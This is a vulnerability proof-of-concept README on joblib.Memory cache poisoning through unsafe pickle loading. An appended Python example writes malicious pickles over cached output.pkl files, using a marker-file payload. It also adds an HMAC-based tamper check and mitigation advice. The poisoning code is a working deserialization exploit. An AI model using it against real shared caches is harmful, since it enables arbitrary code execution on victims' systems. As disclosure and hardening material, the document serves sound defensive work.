Joblib Memory Cache Poisoning PoC (RCE)

This repository contains a Proof-of-Concept (PoC) for a deserialization vulnerability (CWE-502) in the joblib library, specifically in the joblib.Memory caching mechanism: cached results are stored on disk as pickle files and loaded back without integrity verification, so anyone who can write to the cache directory can run code in the process that reads it.

Files

  • output.pkl: A malicious pickle file that executes attacker-controlled code when it is unpickled (arbitrary code execution in the victim process; RCE when the cache directory is reachable remotely, e.g. on shared storage).
  • reproduce.py: A Python script that demonstrates the attack flow from both the victim's and the attacker's perspective.

Vulnerability Overview

The vulnerability (CWE-502, deserialization of untrusted data) allows an attacker with write access to a shared or persistent cache directory to overwrite legitimate cached results (the per-call output.pkl files) with malicious pickle payloads. On the next cache hit, joblib.Memory implicitly deserializes the file without any integrity verification, so the payload runs with the privileges of the victim process. The precondition to check in a deployment is therefore who can write to the cache location: a cache on shared or network storage, in a world-writable directory, or in a directory the attacker already controls turns every cache hit into untrusted pickle loading.

Steps to Reproduce

  1. Install requirements:
    pip install joblib
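
The attack flow from the Vulnerability Overview and the steps above, as an added worked example that is not the repository's reproduce.py or output.pkl. It assumes joblib is installed (step 1) and uses names invented for the demonstration: a scratch directory CACHE_DIR, a cached function expensive, and a payload class MarkerPayload whose payload only creates a marker file in place of a real command-execution primitive. The second half adds a check the page does not include: an HMAC over each cached file, keyed with a secret held outside the cache directory, that a hardened caller verifies before trusting a cache hit.

```python
"""Added example (not the repository's reproduce.py): poison one joblib.Memory
entry, observe the payload run on the next cache hit, then detect the tampering.
Assumes joblib is installed (pip install joblib). The payload only writes a
marker file so the code execution is observable; CACHE_DIR is a scratch dir."""
import glob
import hashlib
import hmac
import os
import pickle
import tempfile

from joblib import Memory

# Scratch cache location for this demo; joblib stores entries below it as
# <CACHE_DIR>/joblib/<module>/<function>/<args hash>/output.pkl
CACHE_DIR = tempfile.mkdtemp(prefix="joblib_poc_")
memory = Memory(location=CACHE_DIR, verbose=0)


@memory.cache
def expensive(x):
    """Stand-in for a slow computation whose result joblib persists to disk."""
    return x * 2


class MarkerPayload:
    """Malicious pickle object: unpickling it makes pickle call exec() on our
    code string. A real payload would call os.system() or similar; this one
    only creates a marker file so the execution is observable."""

    def __init__(self, marker_path):
        self.marker_path = marker_path

    def __reduce__(self):
        code = "open(%r, 'w').write('executed')" % self.marker_path
        return (exec, (code,))


def find_output_pickles(cache_dir):
    """Attacker step: locate joblib's cached results (always named output.pkl)."""
    pattern = os.path.join(cache_dir, "**", "output.pkl")
    return sorted(glob.glob(pattern, recursive=True))


def poison_cache(cache_dir, marker_path):
    """Overwrite every cached result with the malicious pickle; returns the count."""
    targets = find_output_pickles(cache_dir)
    for path in targets:
        with open(path, "wb") as f:
            pickle.dump(MarkerPayload(marker_path), f)
    return len(targets)


def run_poc():
    """Victim fills the cache, attacker poisons it, victim hits the cache again."""
    marker = os.path.join(CACHE_DIR, "marker_poc.txt")
    first = expensive(21)            # miss: computes 42 and writes output.pkl
    poisoned = poison_cache(CACHE_DIR, marker)
    second = expensive(21)           # hit: joblib unpickles the payload (exec -> None)
    return {"first": first, "poisoned": poisoned, "second": second,
            "marker_written": os.path.exists(marker)}


def sign_cache(cache_dir, key):
    """Defender step: HMAC every cached result; the key lives OUTSIDE the cache dir."""
    digests = {}
    for path in find_output_pickles(cache_dir):
        with open(path, "rb") as f:
            digests[path] = hmac.new(key, f.read(), hashlib.sha256).hexdigest()
    return digests


def verify_cache(cache_dir, key, digests):
    """Return cached files that changed since signing or appeared without a digest."""
    tampered = []
    for path in find_output_pickles(cache_dir):
        with open(path, "rb") as f:
            actual = hmac.new(key, f.read(), hashlib.sha256).hexdigest()
        if path not in digests or not hmac.compare_digest(actual, digests[path]):
            tampered.append(path)
    return tampered


def run_hardened():
    """Same attack, but the victim verifies HMACs before trusting a cache hit."""
    memory.clear(warn=False)
    key = os.urandom(32)             # in practice: a secret stored away from the cache
    marker = os.path.join(CACHE_DIR, "marker_hardened.txt")
    expensive(21)
    digests = sign_cache(CACHE_DIR, key)
    clean_before = verify_cache(CACHE_DIR, key, digests) == []
    poison_cache(CACHE_DIR, marker)
    tampered = verify_cache(CACHE_DIR, key, digests)
    # A hardened caller refuses to call expensive(21) while tampered entries
    # exist (clear the cache and recompute instead), so the payload is never unpickled.
    return {"clean_before": clean_before, "tampered": len(tampered),
            "marker_written": os.path.exists(marker)}


if __name__ == "__main__":
    print("poisoned run:", run_poc())
    print("hardened run:", run_hardened())
```

The precondition is the same as on this page: the attacker needs write access to the cache directory, so the first mitigation is a private location (owner-only permissions, not shared or network storage). The HMAC check covers deployments where that is not possible; it only helps if the key and the recorded digests are kept somewhere the attacker cannot write, since a digest stored next to output.pkl can be rewritten together with it.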
    